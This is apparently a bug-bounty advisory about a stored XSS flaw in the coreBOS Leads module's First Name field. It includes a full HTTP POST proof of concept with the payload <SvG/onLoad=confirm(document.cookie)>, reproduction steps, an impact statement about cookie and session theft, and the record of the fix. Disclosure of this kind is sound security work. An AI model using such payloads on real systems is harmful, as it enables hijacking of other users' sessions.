Cross-site Scripting (XSS) - Stored in tsolucio/corebos

Status: Valid

Reported on: Nov 24th 2021


Description

The Leads module's First Name field accepts script markup and stores it unchanged. The stored payload executes every time the record is rendered, for example on page refresh or when the record's URL is opened in a new tab.

Proof of Concept

POST /index.php HTTP/2
Host: demo.corebos.com
Cookie: democoreboscom=2fadf4643e2c92731a5bea4397b2d08b; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=035910400380413154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22977831897677814942874509993
Content-Length: 6178
Referer: https://demo.corebos.com/index.php?module=Leads&action=EditView&record=4196&return_module=Leads&return_action=index&return_viewname=1
Origin: https://demo.corebos.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Gpc: 1
Te: trailers
Connection: close

-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="__vt5rftk"

sid:f19ba3154fc33c9b5c2af7e08003c98a45be79ef,1637780025
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="MAX_FILE_SIZE"

3000000
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="campaignid"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="pagenumber"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="module"

Leads
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="record"

4196
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="mode"

edit
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="action"

Save
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="saverepeat"

0
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_module"

Leads
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_id"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_action"

index
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_viewname"

1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="createmode"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="cbcustominfo1"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="cbcustominfo2"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="Module_Popup_Edit"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="Module_Popup_Save"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="Module_Popup_Save_Param"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="FILTERFIELDSMAP"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="search_url"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="salutationtype"

Mr.
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="firstname"

<SvG/onLoad=confirm(document.cookie)>
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="lead_no"

LEA28
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="lastname"

k
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="phone"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="company"

l
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="mobile"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="designation"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="fax"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="leadsource"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="email"

xavin@gmail.com
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="industry"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="website"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="annualrevenue"

1,00
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="leadstatus"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="noofemployees"

1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="rating"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="secondaryemail"

xavin2@gmail.com
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="assigntype"

T
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="assigned_user_id"

1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="assigned_group_id"

3
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="emailoptout"

on
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="cf_1181"

Value 1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="lane"

322 New Horizon Blvd
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="pobox"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="code"

53207
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="city"

Milwaukee
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="country"

USA
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="state"

WI
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="description"


-----------------------------22977831897677814942874509993--

Step to Reproduce

1. Go to: https://demo.corebos.com/index.php?module=Leads&action=EditView&record=4196&return_module=Leads&return_action=index&return_viewname=1

2. Enter the payload <SvG/onLoad=confirm(document.cookie)> in the First Name field and save the record.

3. Done: the XSS triggers as soon as the saved record is rendered.

Impact

Stored XSS

The victim's browser has no way to know that the script should not be trusted, so it executes it; because the script appears to come from a trusted origin (the coreBOS site itself), it can read any cookies, session tokens or other sensitive information the browser holds for that site, and it can rewrite the content of the HTML page. Here the payload is stored in a Lead record, so it runs in the browser of every coreBOS user who later views that record, with that user's session and privileges.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. (a year ago)

Kiran PP (Researcher), a year ago:

PoC-II

https://drive.google.com/drive/u/0/folders/1tZoV8TDPGvdKIKfTFcd9rFSiTSnpOQfr

We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (a year ago)
Joe Bordes validated this vulnerability. (a year ago)
Kiran PP has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Joe Bordes marked this as fixed in 8.0 with commit c42f09. (a year ago)
Joe Bordes has been awarded the fix bounty.
This vulnerability will not receive a CVE.